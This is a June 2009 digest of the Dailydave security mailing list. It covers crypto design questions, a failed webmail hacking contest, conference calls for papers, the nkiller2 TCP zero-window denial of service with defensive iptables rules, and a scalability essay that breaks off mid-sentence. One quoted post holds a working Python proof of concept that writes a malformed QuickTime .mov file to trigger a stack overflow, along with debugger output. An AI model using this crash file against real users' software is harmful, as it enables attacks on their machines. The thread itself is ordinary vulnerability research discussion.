From dave at immunityinc.com Wed Jun 3 14:00:46 2009 From: dave at immunityinc.com (dave) Date: Wed, 03 Jun 2009 14:00:46 -0400 Subject: [Dailydave] Web Security Is Hard Message-ID: <4A26BA4E.2050901@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 While everyone is concentrating on things like SQL Injection and Cross Site Scripting, the fun can be described as some great posts today: http://www.matasano.com/log/1749/typing-the-letters-a-e-s-into-your-code-youre-doing-it-wrong/ http://news.ycombinator.com/item?id=639976 Although I usually advise people to read Chris Eng's presentation first - - it makes a good appetiser to the Matasano post. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkomuk4ACgkQtehAhL0gheobKQCeMJH3IgshQfBbSaPAF1NVx+2u RTsAn1iXwYZ71vfMm7vfoRIhWLQW1mza =rHpD -----END PGP SIGNATURE----- From jamie.riden at gmail.com Wed Jun 3 14:27:35 2009 From: jamie.riden at gmail.com (Jamie Riden) Date: Wed, 3 Jun 2009 19:27:35 +0100 Subject: [Dailydave] Web Security Is Hard In-Reply-To: <4A26BA4E.2050901@immunityinc.com> References: <4A26BA4E.2050901@immunityinc.com> Message-ID: <17b0fcab0906031127k6903cf3cl8b31f6226afebc46@mail.gmail.com> OK, might as well run this by everyone. IV ++ AES/CBC/PKCS7 padding - encrypted block ++ SHA1-HMAC of secret data if the HMAC doesn't come out same as computed for decrypt we just abort. What's wrong with the above? (assuming we get our PRNG suitably random.) ( SUN's example Java code uses DES in ECB mode - go figure. You do have to type A-E-S in if you're using Java. ) cheers, Jamie 2009/6/3 dave : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > While everyone is concentrating on things like SQL Injection and Cross > Site Scripting, the fun can be described as some great posts today: > > http://www.matasano.com/log/1749/typing-the-letters-a-e-s-into-your-code-youre-doing-it-wrong/ > http://news.ycombinator.com/item?id=639976 > > Although I usually advise people to read Chris Eng's presentation first > - - it makes a good appetiser to the Matasano post. > > - -dave > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org > > iEYEARECAAYFAkomuk4ACgkQtehAhL0gheobKQCeMJH3IgshQfBbSaPAF1NVx+2u > RTsAn1iXwYZ71vfMm7vfoRIhWLQW1mza > =rHpD > -----END PGP SIGNATURE----- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- Jamie Riden / jamesr at europe.com / jamie at honeynet.org.uk http://www.ukhoneynet.org/members/jamie/ From dave.aitel at gmail.com Thu Jun 4 20:37:30 2009 From: dave.aitel at gmail.com (Dave Aitel) Date: Thu, 4 Jun 2009 20:37:30 -0400 Subject: [Dailydave] XSS=10000 Message-ID: I have to admit this is in the top 10 "hacking contest" fails of all time. It's just so great how the very idea of "hacking contest" means a company is either snake oil or totally going to fail (c.f. LSD owning that Solaris thing back in the day). http://www.strongwebmail.com/news/secure-web-mail/break-into-my-email-get-10000-here-is-my-username-and-password/ http://twitpic.com/6ji72/full http://blogs.zdnet.com/security/?p=3514 -dave From rauc at mastergeek.com Thu Jun 4 21:31:03 2009 From: rauc at mastergeek.com (Rauc) Date: Fri, 05 Jun 2009 13:31:03 +1200 Subject: [Dailydave] XSS=10000 In-Reply-To: References: Message-ID: <1244165463.7352.8.camel@slim> > I have to admit this is in the top 10 "hacking contest" fails of all > time. I am not sure that this is really a fail. For only $10k, he managed to get a penetration test that involved numbers of hackers. Sure the product failed to stand up, (Due to a really stupid bug) but the bug was found, and now it can be fixed. We have seen that the world is willing to put up with claims of software being secure, even when it is not. Oracle's 'Unbreakable', Windows NT was 'Unstoppable', and a host of others. Business executives will still choose a product such as this so called Strongmail, if it is marketed well. Additionally, if this company can show that it learns from it's mistakes, as Microsoft had for a time, they will be even better off. --Rauc From deepsec at deepsec.net Fri Jun 5 10:20:36 2009 From: deepsec at deepsec.net (DeepSec Conference) Date: Fri, 5 Jun 2009 16:20:36 +0200 (CEST) Subject: [Dailydave] Reminder: DeepSec 2009 Call for Papers is open Message-ID: <20090605142036.C43F9D00077E@majere.luchs.at> == REMINDER: === DeepSec In-Depth Security Conference 2009 - Triple Sec ==== Call for Papers and Experts The DeepSec organisation reminds everyone of the Call for Papers for the next conference in November 2009. The deadline for submissions is July 15 2009. == Topics == The focus of DeepSec will be on subtle dangers, stealthy exploits and things you don't see (and possibly don't hear or smell, too). If you got something to talk about that doesn't look like a security problem at the first glance, tell us about it. We'd like to hear about underestimated security issues that may be turned into major headaches for computer systems, networks and users alike. Especially anything that subverts harmless technology and turns it into an attack tool is welcome. Send us stories about single bits that can change our destiny. Failing that we welcome less sneaky approaches, too. - AJAX/Web2.0/JavaScript Security - Cloud Computing - Code Analysis - Cryptographical Weaknesses - Digital Espionage - Digital Forensics - eVoting - Failure and Fixes of all kinds - Incident Response - Malware Research - Messaging Technologies - Network Protocols - Operating Systems - Secure Software Development - Security Management - Social Engineering - Virtualisation - VoIP Technology - Web Security - Wireless Technology Please note, that we are a non-product, non-vendor biased security conference and do not welcome vendor pitches in the conference talks or trainings. We will provide an opportunity for vendor self presentation through sponsorship and vendor booths in the conference lounge, where coffee and snacks will be served during the breaks. == Hacker Lounge == If you don't wish to present a talk or conduct a workshop, you can still try to participate. We are looking for hackers who want to show us their gadgets and methods to break (or fix) networks and security systems. You got something that has lots of blinkenlights, stealth or ideas that go well with security topics, we want to hear about it. Submit it on the CfP web page and get a place in the foyer to show off. == Submission == Proposals for talks and trainings at the second annual DeepSec In-Depth Security Conference will be accepted until _July 15th 2009, 23:59 CEST_. All proposals should be submitted through our web site https://deepsec.net/cfp/ or by email to: cfp at deepsec.net == About DeepSec == DeepSec IDSC is an annual European two-day in-depth conference on computer, network, and application security. It takes place in November and aims to bring together the world's leading security professionals from academics, government, industry, business, and the underground hacking community. The conference offers two days of security talks and two days of trainings, covering the latest topics in network and IT security. DeepSec offers a neutral ground to exchange ideas and experiences, thus making it a unique event where all participants can get in contact freely. == Speakers/Trainers == Speaker privileges include: - One economy class return-ticket to Vienna. - 3 nights of accommodation in the conference hotel. - Breakfast, lunch, and two coffee breaks - Speaker activities during, before, and after the conference. - Speaker's Dinner. - Speaker After-Party in the Metalab Hackerspace. Instructor privileges include: - 50% of the net profit of the class. - 2 nights of accommodation in the conference hotel during the trainings. - Breakfast, lunch, and two coffee breaks. - Free ticket for the conference. - Speaker activities during, before, and after the conference. - Speaker After-Party in the Metalab Hackerspace. If you have questions, want to send us additional material, or have problems with the web form, feel free to contact us at: cfp at deepsec.net Best regards, DeepSec In-Depth Security Conference organisation team. https://deepsec.net/contact/ == Partners == SEaCURE.IT Conference - http://www.seacure.it/ From bania.piotr at gmail.com Wed Jun 10 11:18:26 2009 From: bania.piotr at gmail.com (Piotr Bania) Date: Wed, 10 Jun 2009 17:18:26 +0200 Subject: [Dailydave] PAPER: Evading network-level emulation Message-ID: <2561ECF7F6D94D4AB08452434E68ED25@DIED> ABSTRACT Recently more and more attention has been paid to the intrusion detection systems (IDS) which don't rely on signature based detection approach. Such solutions try to increase their defense level by using heuristics detection methods like network-level emulation. This technique allows the intrusion detection systems to stop unknown threats, which normally couldn't be stopped by standard signature detection techniques. In this article author will describe general concepts of network-level emulation technique including its advantages and disadvantages (weak sides) together with providing potential countermeasures against this type of detection method. Paper can be found at: http://piotrbania.com/all/articles/pbania-evading-nemu2009.pdf best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From dave at immunityinc.com Wed Jun 10 16:39:36 2009 From: dave at immunityinc.com (dave) Date: Wed, 10 Jun 2009 16:39:36 -0400 Subject: [Dailydave] Yay for Windows 2000! Message-ID: <4A301A08.5060104@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 It's fun to watch Kostya's exploit own it via MS09-022 (Spooler). This month there were lots of great vulnerabilities disclosed, but obviously spooler was an interesting one and got done first over here. I'm not sure what the "metric" for GREAT is, but even a remote bug in Windows 2000 counts if it's neat enough. Underflow+Overflow+OBO = fun? I guess GREAT is anything you can do before the SMS server can distribute patches. :> It'd be interesting as well to find out any products affected by that MSRPC NDR marshalling bug. There's got to be some out there. unmidl.py should be scriptable to find them too... Also this blog is great, so read up! http://seanhn.wordpress.com/ - -dave '[0x57][0x61][0x6e][0x74][0x20][0x74][0x6f][0x20][0x77][0x6f] [0x72][0x6b][0x20][0x77][0x69][0x74][0x68][0x20][0x73][0x6f] [0x6d][0x65][0x20][0x70][0x65][0x65][0x72][0x73][0x3f][0x20] [0x6a][0x6f][0x62][0x73][0x40][0x69][0x6d][0x6d][0x75][0x6e] [0x69][0x74][0x79][0x69][0x6e][0x63][0x2e][0x63][0x6f][0x6d]' -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkowGggACgkQtehAhL0gheooMwCeNK4WAvbyFiF2z8lVxijE6mWk WyUAn3zpTEtvjWWHvmPsHH3dQSzOfS/c =XBHi -----END PGP SIGNATURE----- From dave at immunityinc.com Thu Jun 11 11:39:20 2009 From: dave at immunityinc.com (dave) Date: Thu, 11 Jun 2009 11:39:20 -0400 Subject: [Dailydave] nkiller2 Message-ID: <4A312528.7060809@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://www.phrack.org/issues.html?issue=66&id=9#article Is it just me or can pretty much every web site in the world get turned off now? I guess you could use iptables to drop the Window Size 0 packets? - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkoxJSgACgkQtehAhL0ghepRSACfUL94jijBDRck2MlOggEKja3e fbIAn0l6fMpWNlOy9ttVmRYubGDoUqfa =mGZB -----END PGP SIGNATURE----- From jmgraham at gmail.com Thu Jun 11 14:05:03 2009 From: jmgraham at gmail.com (Michael Graham) Date: Thu, 11 Jun 2009 14:05:03 -0400 Subject: [Dailydave] nkiller2 In-Reply-To: <54b39b20906110943y60b39734h30a1f7ff41ff6e36@mail.gmail.com> References: <4A312528.7060809@immunityinc.com> <54b39b20906110943y60b39734h30a1f7ff41ff6e36@mail.gmail.com> Message-ID: <54b39b20906111105t370ad11bp6a455c36a84369a6@mail.gmail.com> OK after a few minutes with this I'm not sure you can efficiently do much about it outside of a complex IPS watching for and killing connections that send too many "windows size 0" in response to probes from your server, and then hopefully blocking the IP entirely. On Thu, Jun 11, 2009 at 12:43 PM, Michael Graham wrote: > filter on Windows size = 0 and total connections to a host from a host > thought whatever you're using for a statefull firewall > > > On Thu, Jun 11, 2009 at 11:39 AM, dave wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> http://www.phrack.org/issues.html?issue=66&id=9#article >> >> Is it just me or can pretty much every web site in the world get turned >> off now? >> >> I guess you could use iptables to drop the Window Size 0 packets? >> >> - -dave >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1.4.9 (GNU/Linux) >> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org >> >> iEYEARECAAYFAkoxJSgACgkQtehAhL0ghepRSACfUL94jijBDRck2MlOggEKja3e >> fbIAn0l6fMpWNlOy9ttVmRYubGDoUqfa >> =mGZB >> -----END PGP SIGNATURE----- >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090611/748eeb3e/attachment.htm From etd at nomejortu.com Thu Jun 11 19:28:26 2009 From: etd at nomejortu.com (etd) Date: Fri, 12 Jun 2009 00:28:26 +0100 Subject: [Dailydave] [tool] dradis framework 2.2 released Message-ID: <4A31931A.2040705@nomejortu.com> What is dradis? --------------------------------------------------- - dradis is an open source tool for sharing information. Great to be used during security engagements. - It provides a centralized repository of information. - Client/server architecture with a web interface What is new? --------------------------------------------------- - Add attachments to nodes - Create import export plugins: * connect dradis with your vulnerability database * generate reports with a custom template * ... anything you can think of - interface improvements Better checkout the video: http://dradisframework.org/videos/dradis2-02.html What does it look like? Where do I get more info.? --------------------------------------------------- - Screenshots: http://dradisframework.org/screenshots.html - Project info and download: http://dradisframework.org/ http://sourceforge.net/projects/dradis http://freshmeat.net/projects/dradis - More about plugins (Word, PDF, Excel, txt): http://dradisframework.org/community/index.php?board=2.0 http://usefulfor.com/ruby/2009/03/27/how-to-create-a-dradis-export-plugin/ From David_Falloon at kaltire.com Thu Jun 11 16:29:06 2009 From: David_Falloon at kaltire.com (David_Falloon at kaltire.com) Date: Thu, 11 Jun 2009 13:29:06 -0700 Subject: [Dailydave] nkiller2 In-Reply-To: <54b39b20906111105t370ad11bp6a455c36a84369a6@mail.gmail.com> References: <4A312528.7060809@immunityinc.com><54b39b20906110943y60b39734h30a1f7ff41ff6e36@mail.gmail.com> <54b39b20906111105t370ad11bp6a455c36a84369a6@mail.gmail.com> Message-ID: <5E88100F1802654D85201B4A08E926F3D06FC3@w001pexc01> Something like this should do it in iptables ( assuming I've got the right bytes in the tcp header ;) : iptables -N ZERO_WINDOW_RECENT iptables -A -m u32 --u32 "6&0xFF=0x6 && 4&0x1FFF=0 && 0>>22&0x3C at 12&0xFFFF=0x0000" -j ZERO_WINDOW_RECENT iptables -A ZERO_WINDOW_RECENT -m recent --set --name ZERO_WINDOW iptables -A ZERO_WINDOW_RECENT -m recent --update --seconds 60 --hitcount 2 --name ZERO_WINDOW -j LOG --log-level info --log-prefix "Zero size Window DoS blocked: " iptables -A ZERO_WINDOW_RECENT -m recent --update --seconds 60 --hitcount 2 --name ZERO_WINDOW -j DROP You'll have to tune the hit count and seconds, I haven't played with the attack enough to determine appropriate numbers, but you'd want to drop any new acks with a zero window size long enough to tombstone and reap the connection. --Dave ________________________________ From: dailydave-bounces at lists.immunitysec.com [mailto:dailydave-bounces at lists.immunitysec.com] On Behalf Of Michael Graham Sent: Thursday, June 11, 2009 11:05 AM To: dailydave at lists.immunityinc.com Subject: Re: [Dailydave] nkiller2 OK after a few minutes with this I'm not sure you can efficiently do much about it outside of a complex IPS watching for and killing connections that send too many "windows size 0" in response to probes from your server, and then hopefully blocking the IP entirely. On Thu, Jun 11, 2009 at 12:43 PM, Michael Graham wrote: filter on Windows size = 0 and total connections to a host from a host thought whatever you're using for a statefull firewall On Thu, Jun 11, 2009 at 11:39 AM, dave wrote: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://www.phrack.org/issues.html?issue=66&id=9#article Is it just me or can pretty much every web site in the world get turned off now? I guess you could use iptables to drop the Window Size 0 packets? - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkoxJSgACgkQtehAhL0ghepRSACfUL94jijBDRck2MlOggEKja3e fbIAn0l6fMpWNlOy9ttVmRYubGDoUqfa =mGZB -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From jlloret at dcom.upv.es Thu Jun 11 17:53:40 2009 From: jlloret at dcom.upv.es (Jaime Lloret Mauri) Date: Thu, 11 Jun 2009 23:53:40 +0200 Subject: [Dailydave] CFP: ComputationWorld 2009, November 15-20, 2009 - Athens, Greece Message-ID: <200906112153.n5BLreqS023729@smtp.upv.es> INVITATION Please consider to contribute and encourage your team members and fellow scientists to contribute to the following federated events. Thanks for forwarding the information on this Call for Submissions to those potentially interested to submit. ===== Call for Submissions ======= ComputationWorld 2009, November 15-20, 2009 - Athens, Greece see: http://www.iaria.org/conferences2009/ComputationWorld09.html ComputationWorld 2009 is a federated event focusing on advanced topics concerning the areas of computation. The target topics cover future computing techniques (strategies, mechanisms, technologies), service computation (ubiquitous, web services, societal), cognitive support (AI, agents, learning, autonomy), adaptiveness (component/systems, self-features, metrics), creative content technologies, and patterns. Submission (full paper) deadline: June 30, 2009. Submissions must be electronically done using the ?Submit a Paper? button on the entry page of each conference. For details on the each conference's topics, see the individual Call for Papers. Unpublished high quality contributions in terms of Regular papers and Posters or Work in Progress are welcome. Workshop proposals and Panel proposals on challenging topics are encouraged. Extended versions of selected papers will be published in IARIA on-line Journals (http://www.iariajournals.org). All topics are open to both research and industry contributions. >> FUTURE COMPUTING 2009, The First International Conference on Future Computational Technologies and Applications http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html >> SERVICE COMPUTATION 2009, The First International Conferences on Advanced Service Computing http://www.iaria.org/conferences2009/SERVICECOMPUTATION09.html >> COGNITIVE 2009, The First International Conference on Advanced Cognitive Technologies and Applications http://www.iaria.org/conferences2009/COGNITIVE09.html >> ADAPTIVE 2009, The First International Conference on Adaptive and Self-adaptive Systems and Applications http://www.iaria.org/conferences2009/ADAPTIVE09.html >> CONTENT 2009, The First International Conference on Creative Content Technologies http://www.iaria.org/conferences2009/CONTENT09.html >> PATTERNS 2009, The First International Conferences on Pervasive Patterns and Applications http://www.iaria.org/conferences2009/PATTERNS09.html >> SELFTRUST 2009, The First Workshop on Computational Trust for Self-Adaptive Systems http://www.iaria.org/conferences2009/SELFTRUST.html -------------------------------- IARIA Publicity Board ComputationWorld Advisory Committees ------------------------------- From jlloret at dcom.upv.es Thu Jun 11 17:59:15 2009 From: jlloret at dcom.upv.es (Jaime Lloret Mauri) Date: Thu, 11 Jun 2009 23:59:15 +0200 Subject: [Dailydave] CFP: ComputationWorld 2009, November 15-20, 2009 - Athens, Greece Message-ID: <200906112159.n5BLxFli025039@smtp.upv.es> INVITATION Please consider to contribute and encourage your team members and fellow scientists to contribute to the following federated events. Thanks for forwarding the information on this Call for Submissions to those potentially interested to submit. ===== Call for Submissions ======= ComputationWorld 2009, November 15-20, 2009 - Athens, Greece see: http://www.iaria.org/conferences2009/ComputationWorld09.html ComputationWorld 2009 is a federated event focusing on advanced topics concerning the areas of computation. The target topics cover future computing techniques (strategies, mechanisms, technologies), service computation (ubiquitous, web services, societal), cognitive support (AI, agents, learning, autonomy), adaptiveness (component/systems, self-features, metrics), creative content technologies, and patterns. Submission (full paper) deadline: June 30, 2009. Submissions must be electronically done using the ?Submit a Paper? button on the entry page of each conference. For details on the each conference's topics, see the individual Call for Papers. Unpublished high quality contributions in terms of Regular papers and Posters or Work in Progress are welcome. Workshop proposals and Panel proposals on challenging topics are encouraged. Extended versions of selected papers will be published in IARIA on-line Journals (http://www.iariajournals.org). All topics are open to both research and industry contributions. >> FUTURE COMPUTING 2009, The First International Conference on Future Computational Technologies and Applications http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html >> SERVICE COMPUTATION 2009, The First International Conferences on Advanced Service Computing http://www.iaria.org/conferences2009/SERVICECOMPUTATION09.html >> COGNITIVE 2009, The First International Conference on Advanced Cognitive Technologies and Applications http://www.iaria.org/conferences2009/COGNITIVE09.html >> ADAPTIVE 2009, The First International Conference on Adaptive and Self-adaptive Systems and Applications http://www.iaria.org/conferences2009/ADAPTIVE09.html >> CONTENT 2009, The First International Conference on Creative Content Technologies http://www.iaria.org/conferences2009/CONTENT09.html >> PATTERNS 2009, The First International Conferences on Pervasive Patterns and Applications http://www.iaria.org/conferences2009/PATTERNS09.html >> SELFTRUST 2009, The First Workshop on Computational Trust for Self-Adaptive Systems http://www.iaria.org/conferences2009/SELFTRUST.html -------------------------------- IARIA Publicity Board ComputationWorld Advisory Committees ------------------------------- From nate at root.org Fri Jun 12 17:29:04 2009 From: nate at root.org (Nate Lawson) Date: Fri, 12 Jun 2009 14:29:04 -0700 Subject: [Dailydave] Web Security Is Hard In-Reply-To: <17b0fcab0906031127k6903cf3cl8b31f6226afebc46@mail.gmail.com> References: <4A26BA4E.2050901@immunityinc.com> <17b0fcab0906031127k6903cf3cl8b31f6226afebc46@mail.gmail.com> Message-ID: <4A32C8A0.6070506@root.org> Jamie Riden wrote: > OK, might as well run this by everyone. > > IV ++ AES/CBC/PKCS7 padding - encrypted block ++ SHA1-HMAC of secret data > > if the HMAC doesn't come out same as computed for decrypt we just > abort. What's wrong with the above? (assuming we get our PRNG suitably > random.) The devil is in the details that you left out. Where is the sequence number to distinguish transactions? How are the contents of the message interpreted and in what order? Is this a network server, disk drive controller, or Pay TV smart card? To rephrase for this list: snprintf(buf, sizeof(buf), fmt, data); What's wrong with the above? > ( SUN's example Java code uses DES in ECB mode - go figure. You do > have to type A-E-S in if you're using Java. ) Not if you're using a higher-level library. A higher-level library that chose DES-ECB as the default cipher would indeed be broken. However, once this bug was found, you could get a patch to the library that fixed this default, re-gen keys, and you'd be secure. No changes required for your code, assuming shared libs. Compare this to grepping through all your binaries to be sure you've substituted CONSTANT_AES for CONSTANT_DES everywhere. Crypto is difficult and expensive to get right. Conversely, there are good high-level libraries available. Sure there are a few cases where you have to do custom development, incurring that cost. But making "roll your own" the default development practice is like coding your own webserver in assembly. You can eventually get it right, but you're making your job much harder than it has to be and risking a lot for your company for no real gain. -- Nate From nate at root.org Fri Jun 12 17:32:09 2009 From: nate at root.org (Nate Lawson) Date: Fri, 12 Jun 2009 14:32:09 -0700 Subject: [Dailydave] XSS=10000 In-Reply-To: <1244165463.7352.8.camel@slim> References: <1244165463.7352.8.camel@slim> Message-ID: <4A32C959.5040403@root.org> Rauc wrote: >> I have to admit this is in the top 10 "hacking contest" fails of all >> time. > > I am not sure that this is really a fail. For only $10k, he managed to > get a penetration test that involved numbers of hackers. Sure the > product failed to stand up, (Due to a really stupid bug) but the bug was > found, and now it can be fixed. > > We have seen that the world is willing to put up with claims of software > being secure, even when it is not. Oracle's 'Unbreakable', Windows NT > was 'Unstoppable', and a host of others. > > Business executives will still choose a product such as this so called > Strongmail, if it is marketed well. Additionally, if this company can > show that it learns from it's mistakes, as Microsoft had for a time, > they will be even better off. Nobody is going to buy this webmail thing. That's not the company's goal. The webmail app is a trojan to show off their phone authentication service, which is what they are really trying to sell. -- Nate From jdemott at crucialsecurity.com Mon Jun 15 16:36:41 2009 From: jdemott at crucialsecurity.com (Jared DeMott) Date: Mon, 15 Jun 2009 16:36:41 -0400 Subject: [Dailydave] [Full-disclosure] Apple QuickTime 0day In-Reply-To: <8656dcd50906151154q249ad6e6yda84fe77e0785385@mail.gmail.com> References: <8656dcd50906151154q249ad6e6yda84fe77e0785385@mail.gmail.com> Message-ID: <4A36B0D9.10206@crucialsecurity.com> Excellent. Doesn't trigger on Mac. I just did a talk on QuickTime hacking at ShakaCon III -- which btw -- can I just say "best place for a con ever!". My slides are at www.vdalabs.com. The slides might give you some insight into the types of exceptions you're hoping for. To boil it down, a tool like "!exploitable" is nice since it could be used to bin crashes into "read exception" or "write exception" (the type you're looking for). Oh, and by the way, you can't really call a crash an 0day. I called them "0day crashes" in my talk, just to be clear. Blessings, Jared webDEViL wrote: > Try it with your latest quicktime player. > -------------------------------------------------------------- > > #0:000> !exploitable -v > #HostMachine\HostUser > #Executing Processor Architecture is x86 > > #Debuggee is in User Mode > #Debuggee is a live user mode debugging session on the local machine > #Event Type: Exception > #Exception Faulting Address: 0x66830f9b > #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) > > # > #Faulting Instruction:66830f9b push ebx > # > #Basic Block: > # 66830f9b push ebx > # Tainted Input Operands: ebx > # 66830f9c push ebp > # 66830f9d mov ebp,dword ptr +0x41f (00000420)[esp] > > # 66830fa4 push esi > # 66830fa5 push edi > # 66830fa6 mov edi,ecx > # 66830fa8 cmp edi,offset +0x5ff (00000600) > # 66830fae mov ebx,edx > # 66830fb0 mov dword ptr [esp+14h],eax > > # 66830fb4 mov byte ptr [esp+10h],0 > # 66830fb9 mov byte ptr [esp+11h],0 > # 66830fbe mov byte ptr [esp+12h],0 > # 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) > # > #Exception Hash (Major/Minor): 0x614b6671.0x614b786e > > # > #Stack Trace: > #QuickTime!DllMain+0x2fabb > #+0x1231137 > #Instruction Address: 0x66830f9b > # > #Description: Stack Overflow > #Short Description: StackOverflow > #Exploitability Classification: UNKNOWN > > #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) > > print "------------------------------" > print "w3bd3vil [at] gmail [dot] com" > print "Apple QuickTime CRGN Atom 0day" > > print "------------------------------" > bytes = [ > 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, > 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, > 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, > > 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, > 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, > 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, > 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, > 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, > > 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, > 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, > > 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, > 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, > 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, > 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] > > f = open("webDEViL.mov", "wb") > for byte in bytes: f.write("%c" % byte) > > f.close() > print "webDEViL.mov created! (%d bytes)" % len(bytes) > > From dave at kof.immunityinc.com Tue Jun 16 10:19:18 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Tue, 16 Jun 2009 10:19:18 -0400 Subject: [Dailydave] Scalability - you're doing it wrong! (Or why Ants don't talk) Message-ID: <4e1ef3e50906160719w45e2d475g690e79c6a7d9d61c@mail.gmail.com> A while back someone I knew was trying to solve some sort of crypto-related problem. He ended up saying "I can do it quickly and easily if it's under 40 bits" at which point another mathematician friend of mine rolled her eyes and said "If it's that small, just exhaust." Anyways, it was an important lesson for me in how what is "large" for some people is "just exhaust" size for others. If you go into a normal sized shop building a web application, you can see them struggling furiously to build clusters around a relational database, managing their Storage Area Network, and doing all sorts of things essentially exactly wrong. Realistically you can't scale centralized storage. And you can't scale a relational database. The very idea of your application already knowing everything it needs to know is pretty funny. In a scalable system, what's known is unknown. http://highscalability.com/google-architecture is a good example of an architecture meant to scale. The key sentence is what BigTable CAN'T do. Scalability is about what you can't do, not massively cool algorithms that CAN do something. You can see Google's pitch to Guido Van Rossum with "Yes, but what's the point in designing a language that runs on a non-scalable system? Might as well program only for TI calculators." And right now, pretty much only Google has a scalable system. In this same sense, of course, ants don't use sound to communicate. The big shiny book on the subject is reviewed here: http://www.nytimes.com/2008/11/23/books/review/Jones-t.html . Typically biologists are dealing with systems they can't understand - they're too large, or too numerous, or too small, or just too complex, or just too underfunded. But with superorganisms the size of an ant colony they get a good picture at how real algorithms deal not in behaviors but in emergent behaviors. Also the book has many pretty pictures of ants. Ants are a really large and complex message passing system. Which is totally 